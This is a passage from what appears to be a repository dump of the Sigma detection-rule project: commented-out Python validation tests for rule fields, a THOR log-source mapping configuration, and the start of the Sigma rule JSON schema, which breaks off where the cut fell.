(\"IntegritiLevel\", \"IntegrityLevel\")]\n    #         elif \"file_access\" in logsource:\n    #             del(typos[typos.index((\"TargetFileName\", \"TargetFilename\"))]) # We remove the entry to \"TargetFileName\" to avoid confusion\n    #             typos += [(\"TargetFileName\", \"FileName\"), (\"TargetFilename\",\"FileName\")]\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         for typo in typos:\n    #                             if typo[0] in field:\n    #                                 print(Fore.RED + \"Rule {} has a common typo ({}) which should be ({}) in selection ({}/{})\".format(file, typo[0], typo[1], search_identifier, field))\n    #                                 faulty_rules.append(file)\n\n    #     self.assertEqual(faulty_rules, [], Fore.RED + \"There are rules with common typos in field names.\")\n\n    # Sigma error SigmaModifierError\n    # def test_unknown_value_modifier(self):\n    #     known_modifiers = [\n    #         \"contains\",\n    #         \"startswith\",\n    #         \"endswith\",\n    #         \"all\",\n    #         \"base64offset\",\n    #         \"base64\",\n    #         \"utf16le\",\n    #         \"utf16be\",\n    #         \"wide\",\n    #         \"utf16\",\n    #         \"windash\",\n    #         \"re\",\n    #         \"cidr\",\n    #     ]\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         if \"|\" in field:\n    #                             for current_modifier in field.split(\"|\")[1:]:\n    #                                 found = False\n    #                                 for target_modifier in known_modifiers:\n    #                                     if current_modifier == target_modifier:\n    #                                         found = True\n    #                                 if not found:\n    #                                     print(\n    #                                         Fore.RED\n    #                                         + \"Rule {} uses an unknown field modifier ({}/{})\".format(\n    #                                             file, search_identifier, field\n    #                                         )\n    #                                     )\n    #                                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with unknown value modifiers. Most often it is just a typo.\",\n    #     )\n\n    # sigma error and validator attacktag,cartag,cvetag,detection_tag,stptag,tlptag\n    # def test_optional_tags(self):\n    #     files_with_incorrect_tags = []\n    #     tags_pattern = re.compile(\n    #         r\"cve\\.\\d+\\.\\d+|attack\\.(t\\d{4}\\.\\d{3}|[gts]\\d{4})$|attack\\.[a-z_]+|car\\.\\d{4}-\\d{2}-\\d{3}|detection\\.\\w+\"\n    #     )\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             for tag in tags:\n    #                 if tags_pattern.match(tag) == None:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the invalid tag <{}>\".format(file, tag)\n    #                     )\n    #                     files_with_incorrect_tags.append(file)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_tags,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with incorrect/unknown Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#tags\",\n    #     )\n\n    # sigma error and validator custom_attributes\n    # def test_optional_related(self):\n    #     faulty_rules = []\n    #     valid_type = [\"derived\", \"obsoletes\", \"merged\", \"renamed\", \"similar\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         related_lst = self.get_rule_part(file_path=file, part_name=\"related\")\n    #         if related_lst:\n    #             # it exists but isn't a list\n    #             if not isinstance(related_lst, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'related' field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             else:\n    #                 type_ok = True\n    #                 for ref in related_lst:\n    #                     try:\n    #                         id_str = ref[\"id\"]\n    #                         type_str = ref[\"type\"]\n    #                     except KeyError:\n    #                         print(\n    #                             Fore.YELLOW\n    #                             + \"Rule {} has an invalid form of 'related/type' value.\".format(\n    #                                 file\n    #                             )\n    #                         )\n    #                         faulty_rules.append(file)\n    #                         continue\n    #                     if not type_str in valid_type:\n    #                         type_ok = False\n    #                 # Only add one time if many bad type in the same file\n    #                 if type_ok == False:\n    #                     print(\n    #                         Fore.YELLOW\n    #                         + \"Rule {} has a 'related/type' invalid value.\".format(file)\n    #                     )\n    #                     faulty_rules.append(file)\n    #         else:\n    #             typo_list = []\n    #             # Add more typos\n    #             typo_list.append(\n    #                 self.get_rule_part(file_path=file, part_name=\"realted\")\n    #             )\n    #             typo_list.append(\n    #                 self.get_rule_part(file_path=file, part_name=\"relatde\")\n    #             )\n    #             typo_list.append(self.get_rule_part(file_path=file, part_name=\"relted\"))\n    #             typo_list.append(self.get_rule_part(file_path=file, part_name=\"rlated\"))\n\n    #             for i in typo_list:\n    #                 if i != None:\n    #                     print(\n    #                         Fore.YELLOW\n    #                         + \"Rule {} has a typo in it's 'related' field.\".format(file)\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # sigma error validators date_existence\n    # def test_missing_date(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         datefield = self.get_rule_part(file_path=file, part_name=\"date\")\n    #         if not datefield:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'date'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif not isinstance(datefield, str):\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif len(datefield) != 10:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif datefield[4] != \"/\" or datefield[7] != \"/\":\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'date' (should be YYYY/MM/DD).\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019-01-14)\",\n    #     )\n\n    # sigma validators description_existence description_length\n    # def test_missing_description(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         descriptionfield = self.get_rule_part(\n    #             file_path=file, part_name=\"description\"\n    #         )\n    #         if not descriptionfield:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'description'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif not isinstance(descriptionfield, str):\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a 'description' field that isn't a string.\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         elif len(descriptionfield) < 16:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a really short description. Please elaborate.\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'description' field. (create one, e.g. description: Detects the suspicious behaviour of process XY doing YZ)\",\n    #     )\n\n    # sigma error validators level_existence\n    # def test_level(self):\n    #     faulty_rules = []\n    #     valid_level = [\n    #         \"informational\",\n    #         \"low\",\n    #         \"medium\",\n    #         \"high\",\n    #         \"critical\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         level_str = self.get_rule_part(file_path=file, part_name=\"level\")\n    #         if not level_str:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'level'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif not level_str in valid_level:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a invalid 'level' (check wiki).\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # sigma error\n    # def test_optional_fields(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         fields_str = self.get_rule_part(file_path=file, part_name=\"fields\")\n    #         if fields_str:\n    #             # it exists but isn't a list\n    #             if not isinstance(fields_str, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'fields' field that isn't a list.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'fields' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigma error\n    # def test_optional_falsepositives_listtype(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         falsepositives_str = self.get_rule_part(\n    #             file_path=file, part_name=\"falsepositives\"\n    #         )\n    #         if falsepositives_str:\n    #             # it exists but isn't a list\n    #             if not isinstance(falsepositives_str, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'falsepositives' field that isn't a list.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n\n    # sigma error\n    # # Upgrade Detection Rule License  1.1\n    # def test_optional_author(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         author_str = self.get_rule_part(file_path=file, part_name=\"author\")\n    #         if author_str:\n    #             # it exists but isn't a string\n    #             if not isinstance(author_str, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'author' field that isn't a string.\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'author' fields. (has to be a string even if it contains many author)\",\n    #     )\n\n    # sigma validator custom_attributes\n    # def test_references_plural(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         reference = self.get_rule_part(file_path=file, part_name=\"reference\")\n    #         if reference:\n    #             # it exists but in singular form\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'references' fields. (has to be 'references' in plural form, not singular)\",\n    #     )\n\n\n# sigma-cli validators attacktag\n# def get_mitre_data():\n#     \"\"\"\n#     Use Tags from CTI subrepo to get consitant data\n#     \"\"\"\n#     cti_path = \"cti/\"\n#     cti_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), cti_path)\n\n#     # Get ATT&CK information\n#     lift = attack_client(local_path=cti_path)\n#     # Techniques\n#     MITRE_TECHNIQUES = []\n#     MITRE_TECHNIQUE_NAMES = []\n#     MITRE_PHASE_NAMES = set()\n#     MITRE_TOOLS = []\n#     MITRE_GROUPS = []\n#     # Techniques\n#     enterprise_techniques = lift.get_enterprise_techniques()\n#     for t in enterprise_techniques:\n#         MITRE_TECHNIQUE_NAMES.append(\n#             t[\"name\"].lower().replace(\" \", \"_\").replace(\"-\", \"_\")\n#         )\n#         for r in t.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TECHNIQUES.append(r[\"external_id\"].lower())\n#         if \"kill_chain_phases\" in t:\n#             for kc in t[\"kill_chain_phases\"]:\n#                 if \"phase_name\" in kc:\n#                     MITRE_PHASE_NAMES.add(kc[\"phase_name\"].replace(\"-\", \"_\"))\n#     # Tools / Malware\n#     enterprise_tools = lift.get_enterprise_tools()\n#     for t in enterprise_tools:\n#         for r in t.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TOOLS.append(r[\"external_id\"].lower())\n#     enterprise_malware = lift.get_enterprise_malware()\n#     for m in enterprise_malware:\n#         for r in m.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_TOOLS.append(r[\"external_id\"].lower())\n#     # Groups\n#     enterprise_groups = lift.get_enterprise_groups()\n#     for g in enterprise_groups:\n#         for r in g.external_references:\n#             if \"external_id\" in r:\n#                 MITRE_GROUPS.append(r[\"external_id\"].lower())\n\n#     # Debugging\n#     print(\n#         \"MITRE ATT&CK LIST LENGTHS: %d %d %d %d %d\"\n#         % (\n#             len(MITRE_TECHNIQUES),\n#             len(MITRE_TECHNIQUE_NAMES),\n#             len(list(MITRE_PHASE_NAMES)),\n#             len(MITRE_GROUPS),\n#             len(MITRE_TOOLS),\n#         )\n#     )\n\n#     # Combine all IDs to a big tag list\n#     return [\n#         \"attack.\" + item\n#         for item in MITRE_TECHNIQUES\n#         + MITRE_TECHNIQUE_NAMES\n#         + list(MITRE_PHASE_NAMES)\n#         + MITRE_GROUPS\n#         + MITRE_TOOLS\n#     ]\n\n\nif __name__ == \"__main__\":\n    init(autoreset=True)\n    # Run the tests\n    unittest.main()\n"
  },
  {
    "path": "tests/thor.yml",
    "content": "title: THOR\norder: 20\nbackends:\n    - thor\n# this configuration differs from other configurations and can not be used\n# with the sigmac tool. This configuration is used by the ioc scanners THOR and SPARK.\nlogsources:\n    # log source configurations for generic sigma rules\n    process_creation_1:\n        category: process_creation\n        product: windows\n        conditions:\n            EventID: 1\n        rewrite:\n            product: windows\n            service: sysmon\n    process_creation_2:\n        category: process_creation\n        product: windows\n        conditions:\n            EventID: 4688\n        rewrite:\n            product: windows\n            service: security\n        fieldmappings:\n            Image: NewProcessName\n            ParentImage: ParentProcessName\n    file_change:\n        category: file_change\n        product: windows\n        conditions:\n            EventID: 2\n        rewrite:\n            product: windows\n            service: sysmon\n    network_connection:\n        category: network_connection\n        product: windows\n        conditions:\n            EventID: 3\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_status1:\n        category: sysmon_status\n        product: windows\n        conditions:\n            EventID: 4\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_status2:\n        category: sysmon_status\n        product: windows\n        conditions:\n            EventID: 16\n        rewrite:\n            product: windows\n            service: sysmon\n    process_terminated:\n        category: process_termination\n        product: windows\n        conditions:\n            EventID: 5\n        rewrite:\n            product: windows\n            service: sysmon\n    driver_loaded:\n        category: driver_load\n        product: windows\n        conditions:\n            EventID: 6\n        rewrite:\n            product: windows\n            service: sysmon\n    image_loaded:\n        category: image_load\n        product: windows\n        conditions:\n            EventID: 7\n        rewrite:\n            product: windows\n            service: sysmon\n    create_remote_thread:\n        category: create_remote_thread\n        product: windows\n        conditions:\n            EventID: 8\n        rewrite:\n            product: windows\n            service: sysmon\n    raw_access_thread:\n        category: raw_access_thread\n        product: windows\n        conditions:\n            EventID: 9\n        rewrite:\n            product: windows\n            service: sysmon\n    process_access:\n        category: process_access\n        product: windows\n        conditions:\n            EventID: 10\n        rewrite:\n            product: windows\n            service: sysmon\n    file_creation:\n        category: file_event\n        product: windows\n        conditions:\n            EventID: 11\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event1:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 12\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event2:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 13\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_event3:\n        category: registry_event\n        product: windows\n        conditions:\n            EventID: 14\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_add:\n        category: registry_add\n        product: windows\n        conditions:\n            EventID: 12\n            EventType: CreateKey\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_delete_key:\n        category: registry_delete\n        product: windows\n        conditions:\n            EventID: 12\n            EventType: DeleteKey\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_delete_value:\n        category: registry_delete\n        product: windows\n        conditions:\n            EventID: 12\n            EventType: DeleteValue\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_set:\n        category: registry_set\n        product: windows\n        conditions:\n            EventID: 13\n        rewrite:\n            product: windows\n            service: sysmon\n    registry_rename:\n        category: registry_rename\n        product: windows\n        conditions:\n            EventID: 14\n        rewrite:\n            product: windows\n            service: sysmon\n    create_stream_hash:\n        category: create_stream_hash\n        product: windows\n        conditions:\n            EventID: 15\n        rewrite:\n            product: windows\n            service: sysmon\n    pipe_created1:\n        category: pipe_created\n        product: windows\n        conditions:\n            EventID: 17\n        rewrite:\n            product: windows\n            service: sysmon\n    pipe_created2:\n        category: pipe_created\n        product: windows\n        conditions:\n            EventID: 18\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event1:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 19\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event2:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 20\n        rewrite:\n            product: windows\n            service: sysmon\n    wmi_event3:\n        category: wmi_event\n        product: windows\n        conditions:\n            EventID: 21\n        rewrite:\n            product: windows\n            service: sysmon\n    dns_query:\n        category: dns_query\n        product: windows\n        conditions:\n            EventID: 22\n        rewrite:\n            product: windows\n            service: sysmon\n    file_delete:\n        category: file_delete\n        product: windows\n        conditions:\n            EventID: 23\n        rewrite:\n            product: windows\n            service: sysmon\n    clipboard_change:\n        category: clipboard_change\n        product: windows\n        conditions:\n            EventID: 24\n        rewrite:\n            product: windows\n            service: sysmon\n    process_tampering:\n        category: process_tampering\n        product: windows\n        conditions:\n            EventID: 25\n        rewrite:\n            product: windows\n            service: sysmon\n    file_delete_detected:\n        category: file_delete_detected\n        product: windows\n        conditions:\n            EventID: 26\n        rewrite:\n            product: windows\n            service: sysmon\n    file_block_executable:\n        category: file_block_executable\n        product: windows\n        conditions:\n            EventID: 27\n        rewrite:\n            product: windows\n            service: sysmon\n    file_block_shredding:\n        category: file_block_shredding\n        product: windows\n        conditions:\n            EventID: 28\n        rewrite:\n            product: windows\n            service: sysmon\n    file_executable_detected:\n        category: file_executable_detected\n        product: windows\n        conditions:\n            EventID: 29\n        rewrite:\n            product: windows\n            service: sysmon\n    sysmon_error:\n        category: sysmon_error\n        product: windows\n        conditions:\n            EventID: 255\n        rewrite:\n            product: windows\n            service: sysmon\n    # PowerShell Operational\n    ps_module:\n        category: ps_module\n        product: windows\n        conditions:\n            EventID: 4103\n        rewrite:\n            product: windows\n            service: powershell\n    ps_script:\n        category: ps_script\n        product: windows\n        conditions:\n            EventID: 4104\n        rewrite:\n            product: windows\n            service: powershell\n    # Powershell \"classic\" channel\n    ps_classic_start:\n        category: ps_classic_start\n        product: windows\n        conditions:\n            EventID: 400\n        rewrite:\n            product: windows\n            service: powershell-classic\n    ps_classic_provider_start:\n        category: ps_classic_provider_start\n        product: windows\n        conditions:\n            EventID: 600\n        rewrite:\n            product: windows\n            service: powershell-classic\n    ps_classic_script:\n        category: ps_classic_script\n        product: windows\n        conditions:\n            EventID: 800\n        rewrite:\n            product: windows\n            service: powershell-classic\n    # target system configurations\n    windows-application:\n        product: windows\n        service: application\n        sources:\n            - \"WinEventLog:Application\"\n    windows-security:\n        product: windows\n        service: security\n        sources:\n            - \"WinEventLog:Security\"\n    windows-system:\n        product: windows\n        service: system\n        sources:\n            - \"WinEventLog:System\"\n    windows-ntlm:\n        product: windows\n        service: ntlm\n        sources:\n            - \"WinEventLog:Microsoft-Windows-NTLM/Operational\"\n    windows-sysmon:\n        product: windows\n        service: sysmon\n        sources:\n            - \"WinEventLog:Microsoft-Windows-Sysmon/Operational\"\n    windows-powershell:\n        product: windows\n        service: powershell\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PowerShell/Operational\"\n            - \"WinEventLog:PowerShellCore/Operational\"\n    windows-classicpowershell:\n        product: windows\n        service: powershell-classic\n        sources:\n            - \"WinEventLog:Windows PowerShell\"\n    windows-taskscheduler:\n        product: windows\n        service: taskscheduler\n        sources:\n            - \"WinEventLog:Microsoft-Windows-TaskScheduler/Operational\"\n    windows-wmi:\n        product: windows\n        service: wmi\n        sources:\n            - \"WinEventLog:Microsoft-Windows-WMI-Activity/Operational\"\n    windows-dhcp:\n        product: windows\n        service: dhcp\n        sources:\n            - \"WinEventLog:Microsoft-Windows-DHCP-Server/Operational\"\n    windows-printservice-admin:\n        product: windows\n        service: printservice-admin\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PrintService/Admin\"\n    windows-smbclient-security:\n        product: windows\n        service: smbclient-security\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SmbClient/Security\"\n    windows-smbclient-connectivity:\n        product: windows\n        service: smbclient-connectivity\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SmbClient/Connectivity\"\n    windows-smbserver-connectivity:\n        product: windows\n        service: smbserver-connectivity\n        sources:\n            - \"WinEventLog:Microsoft-Windows-SMBServer/Connectivity\"\n    windows-printservice-operational:\n        product: windows\n        service: printservice-operational\n        sources:\n            - \"WinEventLog:Microsoft-Windows-PrintService/Operational\"\n    windows-terminalservices-localsessionmanager-operational:\n        product: windows\n        service: terminalservices-localsessionmanager\n        sources:\n            - 'WinEventLog:Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'\n    windows-codeintegrity-operational:\n        product: windows\n        service: codeintegrity-operational\n        sources:\n            - \"WinEventLog:Microsoft-Windows-CodeIntegrity/Operational\"\n    windows-applocker:\n        product: windows\n        service: applocker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppLocker/MSI and Script'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/EXE and DLL'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/Packaged app-Deployment'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/Packaged app-Execution'\n    windows-msexchange-management:\n        product: windows\n        service: msexchange-management\n        sources:\n            - 'WinEventLog:MSExchange Management'\n    windows-defender:\n        product: windows\n        service: windefend\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Windows Defender/Operational'\n    windows-defender-antivirus-mapping:\n        category: antivirus\n        conditions:\n            EventID:  # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'\n                - 1006\n                - 1007\n                - 1008\n                - 1009\n                - 1010\n                - 1011\n                - 1012\n                - 1017\n                - 1018\n                - 1019\n                - 1115\n                - 1116\n        rewrite:\n            product: windows\n            service: windefend\n        fieldmappings:\n            Signature: ThreatName\n            Filename: Path\n    windows-firewall-advanced-security:\n        product: windows\n        service: firewall-as\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'\n    windows-bits-client:\n        product: windows\n        service: bits-client\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Bits-Client/Operational'\n    windows-security-mitigations:\n        product: windows\n        service: security-mitigations\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Security-Mitigations/Kernel Mode'\n            - 'WinEventLog:Microsoft-Windows-Security-Mitigations/User Mode'\n    windows-diagnosis:\n        product: windows\n        service: diagnosis-scripted\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Diagnosis-Scripted/Operational'\n    windows-shell-core:\n        product: windows\n        service: shell-core\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Shell-Core/Operational'\n    windows-openssh:\n        product: windows\n        service: openssh\n        sources:\n            - 'WinEventLog:OpenSSH/Operational'\n    windows-ldap-debug:\n        product: windows\n        service: ldap\n        sources:\n            - 'WinEventLog:Microsoft-Windows-LDAP-Client/Debug'\n    windows-bitlocker:\n        product: windows\n        service: bitlocker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-BitLocker/BitLocker Management'\n    windows-vhdmp:\n        product: windows\n        service: vhdmp\n        sources:\n            - 'WinEventLog:Microsoft-Windows-VHDMP/Operational'\n    windows-appxdeployment-server:\n        product: windows\n        service: appxdeployment-server\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppXDeploymentServer/Operational'\n    windows-lsa-server:\n        product: windows\n        service: lsa-server\n        sources:\n            - 'WinEventLog:Microsoft-Windows-LSA/Operational'\n    windows-appxpackaging-om:\n        product: windows\n        service: appxpackaging-om\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppxPackaging/Operational'\n    windows-dns-client:\n        product: windows\n        service: dns-client\n        sources:\n            - 'WinEventLog:Microsoft-Windows-DNS Client Events/Operational'\n    windows-appmodel-runtime:\n        product: windows\n        service: appmodel-runtime\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppModel-Runtime/Admin'\n    windows-capi2:\n        product: windows\n        service: capi2\n        sources:\n            - 'WinEventLog:Microsoft-Windows-CAPI2/Operational'\n    windows-certificateservicesclient-lifecycle:\n        product: windows\n        service: certificateservicesclient-lifecycle-system\n        sources:\n            - 'WinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational'\n    windows-kernel-shimengine:\n        product: windows\n        service: kernel-shimengine\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Kernel-ShimEngine/Operational'\n            - 'WinEventLog:Microsoft-Windows-Kernel-ShimEngine/Diagnostic'\n    windows-application-experience:\n        product: windows\n        service: application-experience\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Application-Experience/Program-Telemetry'\n            - 'WinEventLog:Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant'\n    windows-ntfs:\n        product: windows\n        service: ntfs\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Ntfs/Operational'\n    windows-hyper-v-worker:\n        product: windows\n        service: hyper-v-worker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Hyper-V-Worker'\n    windows-kernel-event-tracing:\n        product: windows\n        service: kernel-event-tracing\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Kernel-EventTracing'\n    windows-sense:\n        product: windows\n        service: sense\n        sources:\n            - 'WinEventLog:Microsoft-Windows-SENSE/Operational'\n    windows-servicebus:\n        product: windows\n        service: servicebus-client\n        sources:\n            - 'WinEventLog:Microsoft-ServiceBus-Client/Admin'\n            - 'WinEventLog:Microsoft-ServiceBus-Client/Operational'\n    windows-iis-configuration:\n        product: windows\n        service: iis-configuration\n        sources:\n            - 'WinEventLog:Microsoft-IIS-Configuration/Operational'\n    apache:\n        category: webserver\n        sources:\n            - \"File:/var/log/apache/*.log\"\n            - \"File:/var/log/apache2/*.log\"\n            - \"File:/var/log/httpd/*.log\"\n    linux-auth:\n        product: linux\n        service: auth\n        sources:\n            - \"File:/var/log/auth.log\"\n            - \"File:/var/log/auth.log.?\"\n    linux-syslog:\n        product: linux\n        service: syslog\n        sources:\n            - \"File:/var/log/syslog\"\n            - \"File:/var/log/syslog.?\"\n    logfiles:\n        category: logfile\n        sources:\n            - \"File:*.log\"\n    logfiles-appliances:\n        category: appliance\n        sources:\n            - \"File:*.log\"\n"
  },
  {
    "path": "tests/validate-sigma-schema/sigma-schema.json",
    "content": "{\n  \"$schema\": \"https://json-schema.org/draft/2020-12/schema#\",\n  \"title\": \"Sigma rule specification V2.0.0 (2024-08-08)\",\n  \"type\": \"object\",\n  \"required\": [\"title\", \"logsource\", \"detection\"],\n  \"properties\": {\n    \"title\": {\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"A brief title for the rule that should contain what the rules is supposed to detect\"\n    },\n    \"id\": {\n      \"type\": \"string\",\n      \"description\": \"A globally unique identifier for the Sigma rule. This is recommended to be a UUID v4, but not mandatory.\",\n      \"format\": \"uuid\"\n    },\n    \"related\": {\n      \"type\": \"array\",\n      \"description\": \"A list of related Sigma rules to keep track of the relationships between detections. This can be used to indicate that a rule is derived from another rule, or that a rule has been obsoleted by another rule.\",\n      \"items\": {\n        \"type\": \"object\",\n        \"required\": [\"id\", \"type\"],\n        \"properties\": {\n          \"id\": {\n            \"type\": \"string\",\n            \"description\": \"A globally unique identifier for the Sigma rule. This is recommended to be a UUID v4, but not mandatory.\",\n            \"format\": \"uuid\"\n          },\n          \"type\": {\n            \"type\": \"string\",\n            \"oneOf\": [\n              {\n                \"const\": \"derived\",\n                \"description\": \"The rule was derived from the referred rule or rules, which may remain active\"\n              },\n              {\n                \"const\": \"obsolete\",\n                \"description\": \"The rule obsoletes the referred rule or rules, which aren't used anymore\"\n              },\n              {\n                \"const\": \"merged\",\n                \"description\": \"The rule was merged from the referred rules. The rules may be still existing and in use\"\n              },\n              {\n                \"const\": \"renamed\",\n                \"description\": \"The rule had previously the referred identifier or identifiers but was renamed for whatever reason, e.g. from a private naming scheme to UUIDs, to resolve collisions etc. It's not expected that a rule with this id exists anymore\"\n              },\n              {\n                \"const\": \"similar\",\n                \"description\": \"Use to relate similar rules to each other (e.g. same detection content applied to different log sources, rule that is a modified version of another rule with a different level)\"\n              }\n            ]\n          }\n        }\n      }\n    },\n    \"name\": {\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"a unique human-readable name that can be used instead of the id as a reference in correlation rules\"\n    },\n    \"taxonomy\":{\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"Defines the taxonomy used in the Sigma rule\"\n    },\n    \"status\": {\n      \"type\": \"string\",\n      \"oneOf\": [\n        {\n          \"const\": \"stable\",\n          \"description\": \"The rule didn't produce any obvious false positives in multiple environments over a long period of time\"\n        },\n        {\n          \"const\": \"test\",\n          \"description\": \"The rule doesn't show any obvious false positives on a limited set 